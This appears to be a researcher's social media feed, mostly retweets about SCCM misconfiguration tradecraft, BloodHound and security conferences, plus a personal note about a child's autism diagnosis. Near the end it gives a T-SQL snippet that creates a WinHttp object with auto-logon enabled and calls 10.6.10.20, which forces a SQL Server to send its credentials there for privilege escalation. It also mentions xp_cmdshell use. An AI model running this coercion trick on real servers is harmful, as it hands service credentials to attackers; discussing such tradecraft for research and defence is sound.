Non-infosec post this time. I try to stray away from talking about my personal life here as much as I can especially when it comes to my family. In November 2023 my son Oliver was diagnosed with level 3 Autism Spectrum Disorder.

RT @G0ldenGunSec: Azure Arc is Microsoft's solution for managing on-premises systems in hybrid environments. My new blog covers how it can….

Before shooting your shot though you can check if the DP you're targeting is setup with PKI certs for clients using RECON-6 and querying the value of DPCertType. 1 == self-signed, 2 == PKI

Last week we added ELEVATE-4 to Misconfiguration Manager. tl;dr If SCCM uses AD CS for PKI, client auth certs are "borrowed" by clients during OSD. This will typically be a distribution point but could be the site server in all-in-one deployments. .

RT @harmj0y: Happy Friday! @tifkin_ and I are happy to announce that we have cut the release for Nemesis 2.0.0 - check out the CHANGELOG fo….

RT @SpecterOps: In the year since Misconfiguration Manager's release, the security community has been actively researching new tradecraft &….

RT @subat0mik: Thanks to everyone who attended our (@unsigned_sh0rt) talk at @WEareTROOPERS! Here is the companion blog post: https://t.c….

RT @SpecterOps: Are you at #TROOPERS25? Don't miss @subat0mik & @unsigned_sh0rt's follow-up to their talk last year, providing an update on….

RT @Jonas_B_K: I publish two blog posts today! 📝🐫 . The first dives into how we're improving the way BloodHound models attack paths through….

RT @SpecterOps: This is your reminder to join @Jonas_B_K's talk happening soon at #TROOPERS25! Hear how security boundaries become attack h….

alias python3='python3 -W ignore'. 🙉🙈.

RT @SkelSec: Well, it happened. The company I worked at for 6 years will be closing and thus I got laid off. This doesn't affect @octopwn o….

RT @harmj0y: Thank you so much to @x33fcon and its organizers for an awesome experience! @tifkin_ and I had a blast talking about the new N….

RT @SpecterOps: Did you catch Misconfiguration Manager: Overprivileged & Overlooked at #TROOPERS24? . @subat0mik & @unsigned_sh0rt will be….

please. just stop

Really enjoyed hearing your initial thoughts behind this one start to finish. great work @_xpn_ !.

Yay HTTP auth. You can do similar tricks to trigger LDAP auth too. Bet stored procedure monitoring is rare.

Like this: . DECLARE @o INT; EXEC sp_OACreate 'WinHttp.WinHttpRequest.5.1', @o OUT; EXEC sp_OAMethod @o, 'open', NULL, 'GET', ' http://10.6.10.20', 'false'; EXEC sp_OAMethod @o, 'SetAutoLogonPolicy', NULL, 0; EXEC sp_OAMethod @o, 'send'; EXEC sp_OADestroy @o;.

Turns out there are. Yeah there's CLR but If you're sysadmin/privileged/OLE already enabled and want to trigger HTTP auth you can use stored procedures and to create an autologon WinHTTP COM object.

Friend recently used this trick posted by @M4yFly to pop a MSSQL box on a non-evasive using xp_cmdshell since EDR was being annoying. It made me curious if there were other ways to trigger HTTP auth for priv esc.